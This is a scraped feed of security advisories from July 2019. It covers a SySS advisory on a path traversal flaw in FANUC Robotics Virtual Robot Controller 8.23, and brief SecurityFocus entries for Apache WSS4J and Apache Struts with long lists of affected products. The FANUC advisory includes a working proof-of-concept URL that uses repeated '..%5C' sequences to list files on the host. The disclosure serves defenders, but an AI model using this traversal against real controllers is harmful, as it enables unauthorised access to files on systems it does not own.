D/XDcAT5gqZQHPVK3FI6T8TqF2wS5xoHfNJcPdh6r52puREImY509sze6VWUfzpp
3hfYCusmlwJye9+cbllFCiLNegSNCDBS+nDrRCCXd3QaoOYjls4=
=hm7Q
-----END PGP SIGNATURE-----

Source:packetstormsecurity.com

↧

FANUC Robotics Virtual Robot Controller 8.23 Path Traversal

July 16, 2019, 1:44 pm

≫ Next: Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability

≪ Previous: FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow

FANUC Robotics Virtual Robot Controller version 8.23 suffers from a path traversal vulnerability.

MD5 | e58d74e82f6894cd3957246d3cb268c5

Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-025
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13584
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to an insufficient validation of user input, the HTTP service of
the application is vulnerable to path traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A path traversal vulnerability was discovered in the log viewer
functionality.

By sending a specially crafted HTTP request to the web server, files and
directories that match the pattern "*.*" can be listed anywhere on the
filesystem. Furthermore, the contents of files named "logfile.txt" can
be read.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The string "..%5C" can be used to access the parent directory.

Therefore, by accessing a URL similar to the following, it is possible
to obtain a list of files (and directories with a . in their name) in
the root directory of the C:\ partition (or another partition, depending
on the software installation).

http://${target_host}:8090/namedrobots/folder/dir/..%5C..%5C..%5C..%5C..%5C..%5C..%5C../

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

It is recommended not making the remote admin web server (vrimserve.exe)
available to untrusted networks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Manufacturer website:
    https://www.fanucamerica.com/
[2] SySS Security Advisory SYSS-2019-025
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-025.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAl0snBMACgkQnODkQEKd
i5bTGw/+P/fk4GBXrn8w3WmnyE+ZGwS8PtCFjRSqYQXo1k49l80TBKDYPEtkjZyS
l6jHSjKkkG5Lq6gPaHIh+2pbz7SZt1KUMgKbVJvpv2wGIsPHaRIilsTZS9mp/Izr
VE6x//BJcDx2UhDJNSQfUwZsCt7FipJLZjOlp9omMU4UPCg3bIlNIVNQCiRQPi98
QZZSDkdzbxvGUfUbEeqIwHUDf7uPjwFV8gCzMW+avrnbt29iyofMmmnTTJmJiDkG
weCOR1CZ25pWV1DSYCvTebnWPxCl51t2N2TFqr5Xs/I56j+VjL5q15tRn/pSDa8H
U4zrBB32pjJDvkIFmoZHSCBFB6VOlfRMSgL6JPgnefd04nLLhzDg4Wkkjp4pz4Jx
gEhpI7GFH1rt+rRnqKdV++kKG0IgRAE/GzUCLza1S4AwXwd1m+kNXyz1NKkcbdz7
hyeI5uGigryee/8/frpqeUzbSA/GSylAzvtl+25ZPqyYbWmr4QNF/lMIPRIkZS+6
7fKG7jWLyLzL7MS9c0flZuawBOO9CKtPwQwpvX9aWkmzyUWhY/3D38oZU0L+oBAo
p16UFGQPLoYTBU9YOQA6kg1gxOU6+XLO2xpJtgyUIG6KbgZiLdT8nWD9z9HSMeD9
9fWrKqAZzqK1UjVFDspbnqlJFtVOB0Zt+myu5/3sBmgqjo3LucQ=
=X9vR
-----END PGP SIGNATURE-----

Source:packetstormsecurity.com

↧

Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability

July 16, 2019, 11:05 pm

≫ Next: Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability

≪ Previous: FANUC Robotics Virtual Robot Controller 8.23 Path Traversal

Apache WSS4J is prone to an information-disclosure vulnerability.

Successfully exploiting this issue can allow an attacker to obtain sensitive information that may aid in launching further attacks.

Information

Bugtraq ID: 72553
Class: Design Error
CVE: CVE-2015-0226

Remote: Yes
Local: No
Published: Feb 10 2015 12:00AM
Updated: Jul 17 2019 05:00AM
Credit: The vendor reported this issue.
Vulnerable: Redhat JBoss Fuse 6.1.0
Redhat JBoss Enterprise Application Platform 6.3
Redhat JBoss A-MQ 6.1.0
Oracle PeopleSoft Enterprise PeopleTools 8.57
Oracle PeopleSoft Enterprise PeopleTools 8.56
Oracle PeopleSoft Enterprise PeopleTools 8.55
IBM WebSphere Application Server Liberty Profile 8.5.5.5
IBM WebSphere Application Server Liberty Profile 8.5.5.4
IBM WebSphere Application Server Liberty Profile 8.5.5.3
IBM WebSphere Application Server Liberty Profile 8.5.5.2
IBM WebSphere Application Server Liberty Profile 8.5.5.1
IBM WebSphere Application Server Liberty Profile 8.5
IBM Care management 6.0
IBM CÃºram Social Program Management 6.0.5
IBM CÃºram Social Program Management 6.0.4
IBM CÃºram Social Program Management 6.1
IBM CÃºram Social Program Management 6.0 SP2
IBM CÃºram Social Program Management 5.2 SP6
Apache Wss4j 1.6.14
Apache Wss4j 2.0.1
Apache Wss4j 1.6.16
Apache Wss4j 1.6.15
Apache Wss4j 1.6.13
Apache Wss4j 1.6.12
Apache Wss4j 1.6.11
Apache Wss4j 1.6.10

Not Vulnerable: Redhat JBoss Fuse 6.2
Redhat JBoss Enterprise Application Platform 6.4
Redhat JBoss A-MQ 6.2
IBM WebSphere Application Server Liberty Profile 8.5.5.6
Apache Wss4j 2.0.2
Apache Wss4j 1.6.17

Exploit

Attackers can use readily available tools to exploit this issue.

References:

Apache WSS4J Homepage (The Apache Software Foundation)
CVE-2015-0226: Apache WSS4J is (still) vulnerable to Bleichenbacher's attack (The Apache Software Foundation)
Important: Red Hat JBoss A-MQ 6.2.0 update (Red Hat)
Important: Red Hat JBoss Fuse 6.2.0 update (Red Hat)
Oracle Critical Patch Update Advisory - July 2019 (Oracle)
RHSA-2015-0849 (Red Hat)
swg21959083: Security Bulletin: Multiple Security Vulnerabilities fixed in IBM W (IBM)
swg21964133: Vulnerabilities in WSS4J affects IBM C?ram (CVE-2015-0226 & CVE-201 (IBM)

Source:www.securityfocus.com

↧

Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability

July 17, 2019, 1:07 am

≫ Next: OWASP AntiSamy CVE-2017-14735 Cross Site Scripting Vulnerability

≪ Previous: Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability

Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input.

An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.

Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.

Information

Bugtraq ID: 67121
Class: Design Error
CVE: CVE-2014-0114

Remote: Yes
Local: No
Published: Apr 29 2014 12:00AM
Updated: Jul 17 2019 07:00AM
Credit: Rene Gielen
Vulnerable: VMWare vCenter Server 5.5
VMWare vCenter Server 5.1
VMWare vCenter Server 5.0
SuSE SUSE Linux Enterprise Software Development Kit 11 SP3
SuSE Manager (for SLE 11 SP2) 1.7
Redhat Network Satellite Server (for RHEL 6) 5.6
Redhat Network Satellite Server (for RHEL 6) 5.5
Redhat Network Satellite Server (for RHEL 6) 5.4
Redhat JBoss Operations Network 3.2.1
Redhat JBoss Fuse 6.1.0
Redhat Fuse ESB Enterprise 7.1.0
Redhat Enterprise Linux Desktop Workstation 5 client
Redhat Enterprise Linux 5 Server
Oracle Weblogic Server 12.1.3
Oracle Weblogic Server 12.1.2 0
Oracle Weblogic Server 12.1.1 0
Oracle Weblogic Server 10.3.6 0
Oracle Weblogic Server 12.2.1.2
Oracle Weblogic Server 12.2.1.1
Oracle Weblogic Server 12.2.1.0
Oracle Weblogic Server 12.1.3.0
Oracle Weblogic Server 10.0.2
Oracle Weblogic Portal 10.3.6.0
Oracle Weblogic Portal 10.2.1.0
Oracle Weblogic Portal 10.0.1.0
Oracle Waveset 8.1.1
Oracle Utilities Framework 4.3.0.3.0
Oracle Utilities Framework 4.3.0.2.0
Oracle Utilities Framework 4.3.0.1.0
Oracle Utilities Framework 4.2.0.3.0
Oracle Utilities Framework 4.2.0.2.0
Oracle Utilities Framework 4.2.0.1.0
Oracle Utilities Framework 4.1.0.2.0
Oracle Utilities Framework 4.1.0.1.0
Oracle Retail Returns Management 2.0
Oracle Retail Returns Management 14.0
Oracle Retail Returns Management 13.4
Oracle Retail Returns Management 13.3
Oracle Retail Returns Management 13.2
Oracle Retail Returns Management 13.1
Oracle Retail Markdown Optimization 13.4
Oracle Retail Markdown Optimization 13.2
Oracle Retail Markdown Optimization 13.1
Oracle Retail Markdown Optimization 13.0
Oracle Retail Markdown Optimization 12.0
Oracle Retail Invoice Matching 14.1
Oracle Retail Invoice Matching 14.0
Oracle Retail Invoice Matching 13.2
Oracle Retail Invoice Matching 13.1
Oracle Retail Invoice Matching 13.0
Oracle Retail Invoice Matching 12.1
Oracle Retail Invoice Matching 12.0IN
Oracle Retail Invoice Matching 12.0
Oracle Retail Invoice Matching 11.0
Oracle Retail Clearance Optimization Engine 14.0
Oracle Retail Clearance Optimization Engine 13.4
Oracle Retail Clearance Optimization Engine 13.3
Oracle Retail Central Office 8.0
Oracle Retail Central Office 14.0
Oracle Retail Central Office 13.4
Oracle Retail Central Office 13.3
Oracle Retail Central Office 13.2
Oracle Retail Central Office 13.1
Oracle Retail Central Office 13.0
Oracle Retail Central Office 12.0.9IN
Oracle Retail Central Office 12.0
Oracle Retail Back Office 8.0
Oracle Retail Back Office 14.1
Oracle Retail Back Office 14.0
Oracle Retail Back Office 13.4
Oracle Retail Back Office 13.3
Oracle Retail Back Office 13.2
Oracle Retail Back Office 13.1
Oracle Retail Back Office 13.0
Oracle Retail Back Office 12.0.9IN
Oracle Retail Back Office 12.0
Oracle Retail Allocation 13.2
Oracle Retail Allocation 13.1
Oracle Retail Allocation 13.0
Oracle Retail Allocation 12.0
Oracle Retail Allocation 11.0
Oracle Retail Allocation 10.0
Oracle Real-Time Decision Server 11.1.1.7
Oracle Real-Time Decision Platform 3.0
Oracle Primavera P6 Enterprise Project Portfolio Management 8.4
Oracle Primavera P6 Enterprise Project Portfolio Management 8.3
Oracle Primavera P6 Enterprise Project Portfolio Management 8.2
Oracle Primavera P6 Enterprise Project Portfolio Management 8.1
Oracle Primavera P6 Enterprise Project Portfolio Management 8.0
Oracle Primavera P6 Enterprise Project Portfolio Management 7.0
Oracle Primavera P6 Enterprise Project Portfolio Management 16.2
Oracle Primavera P6 Enterprise Project Portfolio Management 16.1
Oracle Primavera P6 Enterprise Project Portfolio Management 15.2
Oracle Primavera P6 Enterprise Project Portfolio Management 15.1
Oracle Primavera Contract Management 14.0
Oracle Primavera Contract Management 13.1
Oracle Knowledge 8.5.1
Oracle Knowledge 8.6.1
Oracle Knowledge 8.6.0
Oracle Knowledge 8.5.1.7
Oracle JDeveloper 12.1.3 0
Oracle JDeveloper 12.1.2 0.0
Oracle JDeveloper 11.1.2 4.0
Oracle JDeveloper 11.1.1 7.0
Oracle JDeveloper 10.1.3.5.0
Oracle Insurance IFRS 17 Analyzer 8.0.7
Oracle Insurance IFRS 17 Analyzer 8.0.6
Oracle Identity Manager 11.1.2 2
Oracle Identity Manager 11.1.2 1.0
Oracle Identity Manager 11.1.1.7
Oracle Identity Manager 11.1.1.5
Oracle Fusion Middleware 11.1.2 2.0
Oracle Fusion Middleware 11.1.2 1.0
Oracle Fusion Middleware 11.1.1 7.0
Oracle Fusion Middleware 11.1.1.5.0
Oracle Enterprise Linux 5
Oracle Enterprise Data Quality 9.0.11
Oracle Enterprise Data Quality 8.1.2
Oracle Communications WebRTC Session Controller 7.2
Oracle Communications WebRTC Session Controller 7.1
Oracle Communications WebRTC Session Controller 7.0
Oracle Communications MetaSolv Solution 6.2.1 0.0
NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0.5 1
NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0 1
Mandriva Business Server 1 X86 64
Mandriva Business Server 1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Liferay Portal 6.2.1-ce-ga2-securit
Liferay Portal 6.2.1
Juniper Security Threat Response Manager 2013.2
Juniper Security Threat Response Manager 2012.1
Juniper Secure Analytics 2013.2
Juniper Secure Analytics 2012.1
IBM WebSphere Service Registry and Repository 8.5
IBM WebSphere Service Registry and Repository 8.0
IBM WebSphere Service Registry and Repository 7.5
IBM WebSphere Service Registry and Repository 7.0
IBM WebSphere Service Registry and Repository 6.3
IBM WebSphere Service Registry and Repository 6.2
IBM WebSphere Sensor Events 7.0
IBM Websphere Portal 7.0
IBM Websphere Portal 8.5
IBM Websphere Portal 8.0
IBM Websphere Portal 6.1
IBM WebSphere Partner Gateway Express Edition 6.0.0.3
IBM WebSphere Partner Gateway Express Edition 6.0
IBM WebSphere Partner Gateway Enterprise Edition 6.2
IBM WebSphere Partner Gateway Advanced Edition 6.2
IBM WebSphere Lombardi Edition 7.2
IBM WebSphere Lombardi Edition 7.1.0
IBM WebSphere Enterprise Service Bus 7.5
IBM WebSphere Enterprise Service Bus 7
IBM WebSphere Enterprise Service Bus 6.2
IBM Websphere Application Server 8.5.5
IBM Websphere Application Server 8.0 2
IBM Websphere Application Server 8.0 1
IBM Websphere Application Server 7.0 21
IBM Websphere Application Server 8.5
IBM Websphere Application Server 8.0.0.3
IBM Websphere Application Server 8.0
IBM Websphere Application Server 7.0.0.31
IBM Websphere Application Server 7.0.0.27
IBM Websphere Application Server 7.0.0.25
IBM Websphere Application Server 7.0.0.23
IBM Websphere Application Server 7.0.0.19
IBM Websphere Application Server 7.0.0.17
IBM Websphere Application Server 7.0.0.15
IBM Websphere Application Server 7.0.0.13
IBM Websphere Application Server 7.0
IBM Websphere Application Server 6.1.0.47
IBM Websphere Application Server 6.1.0.45
IBM Websphere Application Server 6.1.0.43
IBM Websphere Application Server 6.1.0.39
IBM Websphere Application Server 6.1.0.37
IBM Websphere Application Server 6.1.0.35
IBM Websphere Application Server 6.1.0.34
IBM Websphere Application Server 6.1.0.33
IBM Websphere Application Server 6.1.0.31
IBM Websphere Application Server 6.1
IBM WEB Interface for Content Management 1.0.4
IBM Tivoli Workload Scheduler z/OS Connector 8.5.1
IBM Tivoli Workload Scheduler z/OS Connector 8.5
IBM Tivoli Workload Scheduler Distributed 8.6
IBM Tivoli Workload Scheduler Distributed 8.5.1
IBM Tivoli Workload Scheduler Distributed 8.5
IBM Tivoli Workload Scheduler Distributed 8.4
IBM Tivoli System Automation Application Manager 3.2.2
IBM Tivoli System Automation Application Manager 3.2.1
IBM Tivoli System Automation Application Manager 3.2
IBM Tivoli System Automation Application Manager 3.1
IBM Tivoli Storage Productivity Center 5.1.1 3
IBM Tivoli Storage Productivity Center 5.1.1
IBM Tivoli Storage Productivity Center 5.1
IBM Tivoli Storage Productivity Center 4.2.2 143
IBM Tivoli Storage Productivity Center 5.1.1.4
IBM Tivoli Storage Productivity Center 5.1.1.2
IBM Tivoli Storage Productivity Center 5.1.1.1
IBM Tivoli Storage Productivity Center 5.1.1.0
IBM Tivoli Storage Productivity Center 5.1
IBM Tivoli Storage Productivity Center 4.2.2.177
IBM Tivoli Storage Productivity Center 4.2.2.145
IBM Tivoli Storage Productivity Center 4.2.1
IBM Tivoli Storage Productivity Center 4.2.0
IBM Tivoli Storage Productivity Center 4.1
IBM Tivoli Storage Manager Administration Center 6.3
IBM Tivoli Storage Manager Administration Center 6.2
IBM Tivoli Storage Manager Administration Center 6.1
IBM Tivoli Storage Manager 6.3.0
IBM Tivoli Storage Manager 6.2
IBM Tivoli Storage Manager 6.1
IBM Tivoli Provisioning Manager for Software 5.1
IBM Tivoli Provisioning Manager 7.2
IBM Tivoli Provisioning Manager 7.1
IBM Tivoli Provisioning Manager 5.1
IBM Tivoli Netcool/OMNIbus Web GUI 7.4
IBM Tivoli Netcool/OMNIbus Web GUI 7.3.1
IBM Tivoli Netcool/OMNIbus Web GUI 7.3
IBM Tivoli Netcool Configuration Manager 6.4.1
IBM Tivoli Netcool Configuration Manager 6.3
IBM Tivoli Netcool Configuration Manager 6.4
IBM Tivoli Netcool Configuration Manager 6.2
IBM Tivoli Integrated Portal 1.1.1 15
IBM Tivoli Integrated Portal 1.1.1 14
IBM Tivoli Integrated Portal 2.2
IBM Tivoli Integrated Portal 2.1
IBM Tivoli Integrated Portal 1.1.1.19
IBM Tivoli Integrated Portal 1.1
IBM Tivoli Identity Manager 5.1
IBM Tivoli Identity Manager 5.0
IBM Tivoli Foundations for Application Manager 1.2
IBM Tivoli Endpoint Manager for Remote Control 9.0
IBM Tivoli Endpoint Manager for Remote Control 8.2.1
IBM Tivoli Endpoint Manager for Remote Control 9.0.1
IBM Tivoli Endpoint Manager for Remote Control 8.2
IBM Tivoli Dynamic Workload Console 8.5.1
IBM Tivoli Dynamic Workload Console 8.5
IBM Tivoli Dynamic Workload Console 8.4
IBM Tivoli Dynamic Workload Console 8.6.0.0
IBM Tivoli Composite Application Manager for Websphere 6.1
IBM Tivoli Composite Application Manager for Application Diagnostics 7.1
IBM Tivoli Application Dependency Discovery Manager 7.2.2
IBM Tivoli Application Dependency Discovery Manager 7.2.1
IBM Tivoli Application Dependency Discovery Manager 7.2
IBM Tivoli Application Dependency Discovery Manager 7.1.2
IBM Social Media Analytics 1.3
IBM Social Media Analytics 1.2
IBM Smart Analytics System 7700 0
IBM Smart Analytics System 7600 0
IBM Smart Analytics System 5710 0
IBM Smart Analytics System 5600 2
IBM Smart Analytics System 5600 1
IBM Smart Analytics System 2050 0
IBM Smart Analytics System 1050 0
IBM Security SiteProtector System 3.1
IBM Security SiteProtector System 3.0
IBM Security QRadar 7.2.2
IBM Security QRadar 7.2
IBM Security QRadar 7.1
IBM Security QRadar 7.0
IBM Security Identity Manager 6.0
IBM Records Manager 8.5
IBM Records Manager 8.4
IBM Rational Reporting for Development Intelligence 2.0.6
IBM Rational Reporting for Development Intelligence 2.0.5
IBM Rational Reporting for Development Intelligence 2.0.4
IBM Rational Reporting for Development Intelligence 2.0.3
IBM Rational Reporting for Development Intelligence 2.0.1
IBM Rational Reporting for Development Intelligence 2.0 1
IBM Rational Reporting for Development Intelligence 1.0.2 1
IBM Rational Reporting for Development Intelligence 1.0.2
IBM Rational Reporting for Development Intelligence 2.0
IBM Rational Insight 1.1.1 3
IBM Rational Insight 1.1.1 2
IBM Rational Insight 1.1.1 1
IBM Rational Insight 1.1.1
IBM Rational Insight 1.0.1 1
IBM Rational Insight 1.0.1
IBM Rational Insight 1.1
IBM Rational Insight 1.0.1 iFix1
IBM Rational Application Developer 9.0.1
IBM Rational Application Developer 8.5.5
IBM Rational Application Developer 8.5.1
IBM Rational Application Developer 8.0.4 3
IBM Rational Application Developer 8.0.4 2
IBM Rational Application Developer 8.0.4 1
IBM Rational Application Developer 8.0.4
IBM Rational Application Developer 8.0.3
IBM Rational Application Developer 8.0.2
IBM Rational Application Developer 8.0.1
IBM Rational Application Developer 7.5.5 5
IBM Rational Application Developer 7.5.5 3
IBM Rational Application Developer 7.5.5 2
IBM Rational Application Developer 7.5.5 1
IBM Rational Application Developer 7.5.5
IBM Rational Application Developer 7.5.4
IBM Rational Application Developer 7.5.3
IBM Rational Application Developer 7.5.2
IBM Rational Application Developer 7.5.1
IBM Rational Application Developer 7.0 9
IBM Rational Application Developer 7.0 8
IBM Rational Application Developer 7.0 7
IBM Rational Application Developer 7.0 6
IBM Rational Application Developer 7.0 5
IBM Rational Application Developer 7.0 4
IBM Rational Application Developer 7.0 3
IBM Rational Application Developer 7.0 2
IBM Rational Application Developer 7.0 10
IBM Rational Application Developer 7.0 1
IBM Rational Application Developer 9.1
IBM Rational Application Developer 9.0
IBM Rational Application Developer 8.5
IBM Rational Application Developer 8.0
IBM Rational Application Developer 7.5
IBM Rational Application Developer 7.0
IBM QRadar SIEM 7.2 MR2
IBM QRadar SIEM 7.1 MR2
IBM QRadar SIEM 7.0 MR5
IBM Predictive Insight 9.1
IBM Predictive Insight 7.0
IBM OpenPages GRC Platform 7.0
IBM OpenPages GRC Platform 6.2.1
IBM OpenPages 7.0
IBM OpenPages 6.1.0.1
IBM OpenPages 6.0.1.5
IBM OpenPages 6.0
IBM OmniFind Enterprise Edition 9.1
IBM Lotus Quickr for WebSphere Portal 8.5
IBM Lotus Expeditor 6.2.3
IBM Lotus Expeditor 6.2.2
IBM Lotus Expeditor 6.2.1
IBM Lotus Expeditor 6.2
IBM Leads 9.1
IBM Leads 7.0
IBM Infosphere Master Data Management Server For Product Information 9.1
IBM Infosphere Master Data Management Server For Product Information 9.0
IBM InfoSphere Master Data Management - Collaborative Edition 11.0
IBM InfoSphere Master Data Management - Collaborative Edition 10.1
IBM InfoSphere Master Data Management - Collaborative Edition 10.0
IBM InfoSphere MashupHub 3.0
IBM InfoSphere MashupHub 2.0
IBM InfoSphere Information Server 9.1.2.0
IBM InfoSphere Information Server 9.1
IBM InfoSphere Information Server 8.7
IBM InfoSphere Information Server 8.5
IBM InfoSphere Information Server 8.1
IBM InfoSphere Information Server 8.0
IBM InfoSphere Identity Insight 8.1
IBM InfoSphere Identity Insight 8.0
IBM InfoSphere Balanced Warehouse D5100
IBM InfoSphere Balanced Warehouse C4000
IBM InfoSphere Balanced Warehouse C3000
IBM IBM InfoSphere Information Server 9.1
IBM IBM InfoSphere Information Server 8.7
IBM IBM InfoSphere Information Server 8.5
IBM IBM InfoSphere Information Server 8.1
IBM Financial Transaction Manager 2.1
IBM FileNet P8 Platform Content Search Engine 4.5.1
IBM FileNet P8 Platform Content Search Engine 5.1
IBM FileNet P8 Platform Content Search Engine 5.0
IBM FileNet Content Manager Content Engine 5.2.0
IBM Endpoint Manager for Remote Control 9.1.0
IBM DS8870 7.3
IBM DS8870 7.2
IBM DS8870 7.1
IBM DS8870 7.0
IBM Distributed Marketing 9.1
IBM Distributed Marketing 9.0
IBM Distributed Marketing 8.6
IBM Distributed Marketing 8.5
IBM Distributed Marketing 8.2
IBM Distributed Marketing 8.0
IBM Distributed Marketing 7.5
IBM Distributed Marketing 7.0
IBM Content Navigator 2.0.2
IBM Content Navigator 2.0.1
IBM Content Navigator 2.0
IBM Content Manager Records Enabler 8.5
IBM Content Manager Records Enabler 8.4
IBM Content Collector 2.2
IBM Content Analytics with Enterprise Search 3.0
IBM Content Analytics with Enterprise Search 2.2
IBM Contact Optimization 9.1
IBM Contact Optimization 8.0
IBM Contact Optimization 7.0
IBM Connections 3.0 0
IBM Connections 2.0.1 0
IBM Connections 5.0
IBM Connections 4.5
IBM Connections 4.0
IBM Connections 3.0.1.1
IBM Connections 3.0.1.0
IBM Connections 3.0.1
IBM Connections 3.0
IBM Connections 2.5.0.3
IBM Connections 2.5.0.2
IBM Connections 2.5.0.1
IBM Connections 2.5.0.0
IBM Connections 2.0.1.1
IBM Connections 2.0.0.0
IBM Cognos Business Intelligence 10.2.1
IBM Cognos Business Intelligence 10.1.1
IBM Cognos Business Intelligence 8.4.1
IBM Cognos Business Intelligence 10.2
IBM Cognos Business Intelligence 10.1
IBM Campaign 9.1
IBM Campaign 9.0
IBM Campaign 8.6
IBM Campaign 8.5
IBM Campaign 8.3
IBM Campaign 8.2
IBM Campaign 8.1
IBM Campaign 8.0
IBM Campaign 7.6
IBM Campaign 7.5
IBM Campaign 7.4
IBM Campaign 7.3
IBM Campaign 7.2
IBM Campaign 7.1
IBM Campaign 7.0
IBM Business Process Manager Standard 8.5.5
IBM Business Process Manager Standard 8.5.0
IBM Business Process Manager Standard 8.0.x
IBM Business Process Manager Standard 7.5.0
IBM Business Process Manager Express 8.5.5
IBM Business Process Manager Express 8.5.0
IBM Business Process Manager Express 8.0.0
IBM Business Process Manager Express 7.5.0
IBM Business Process Manager Advanced 8.5.5
IBM Business Process Manager Advanced 8.5
IBM Business Process Manager Advanced 8.5.0.1
IBM Business Process Manager Advanced 8.0.1.2
IBM Business Process Manager Advanced 8.0.1.1
IBM Business Process Manager Advanced 8.0.0
IBM Business Process Manager Advanced 7.5.1.2
IBM Business Process Manager Advanced 7.5.1.1
IBM Business Process Manager Advanced 7.5.0
IBM Application Manager for Smart Business 1.2.1
HP XP7 Global Link Manager Software 8.0.0-00
HP XP7 Global Link Manager Software 7.6.0-02
HP XP7 Global Link Manager Software 6.4.0-00
HP XP P9000 Tiered Storage Manager 8.0.0-06
HP XP P9000 Tiered Storage Manager 8.0.0-00
HP XP P9000 Tiered Storage Manager 7.6.1-06
HP XP P9000 Tiered Storage Manager 1.1.0-00
HP XP P9000 Replication Manager 8.0.0-06
HP XP P9000 Replication Manager 8.0.0-00
HP XP P9000 Replication Manager 7.6.1-06
HP XP P9000 Replication Manager 6.0.0-00
HP XP P9000 Replication Manager 5.0.0-00
HP SiteScope Monitors 11.32IP1
HP SiteScope Monitors 11.20
HP SiteScope 11.24
HP SiteScope 11.22
HP SiteScope 11.21
HP SiteScope 11.20
HP SiteScope 11.2
HP SiteScope 11.12
HP SiteScope 11.11
HP SiteScope 11.10
HP SiteScope 11.1
HP IceWall Configuration Manager 3.0
HP Device Manager 8.0.0-06
HP Device Manager 8.0.0-00
HP Device Manager 7.6.1-06
HP Device Manager 1.0.0-00
Hitachi Tuning Manager Software 7.0 01 (Windows)
Hitachi Tuning Manager Software 7.0 01 (Solaris(SPARC))
Hitachi Tuning Manager Software 7.0 (Windows)
Hitachi Tuning Manager Software 7.0 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.4 02 (Windows)
Hitachi Tuning Manager Software 6.4 02 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.4 01 (Windows)
Hitachi Tuning Manager Software 6.4 01 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.2 -01 (Windows)
Hitachi Tuning Manager Software 6.2 -01 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.2 -00 (Windows)
Hitachi Tuning Manager Software 6.2 -00 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.1 -00 (Windows)
Hitachi Tuning Manager Software 6.1 -00 (Solaris(SPARC))
Hitachi Tuning Manager Software 6.0 (Windows)
Hitachi Tuning Manager Software 6.0 (Solaris(SPARC))
Hitachi Tuning Manager Software 8.0.0-05 (Windows)
Hitachi Tuning Manager Software 8.0.0-05 (Linux(SuSE
Hitachi Tuning Manager Software 8.0.0-05 (Linux(RHEL
Hitachi Tuning Manager Software 8.0.0-04 (Windows)
Hitachi Tuning Manager Software 8.0.0-04 (Linux)
Hitachi Tuning Manager Software 8.0.0-03 (Windows)
Hitachi Tuning Manager Software 8.0.0-03 (Linux)
Hitachi Tuning Manager Software 8.0.0-00 (Windows)
Hitachi Tuning Manager Software 8.0.0-00 (Linux(SuSE
Hitachi Tuning Manager Software 8.0.0-00 (Linux(RHEL
Hitachi Tuning Manager Software 7.6.1-05 (Windows)
Hitachi Tuning Manager Software 7.6.1-05 (Solaris)
Hitachi Tuning Manager Software 7.6.1-05 (Solaris(x6
Hitachi Tuning Manager Software 7.6.1-05 (Solaris(SP
Hitachi Tuning Manager Software 7.6.1-05 (Linux(RHEL
Hitachi Tuning Manager Software 7.5.0-02
Hitachi Tuning Manager Software 7.4.0-02 (Windows)
Hitachi Tuning Manager Software 7.4.0-02 (Solaris(SP
Hitachi Tuning Manager Software 7.4.0-02 (Linux)
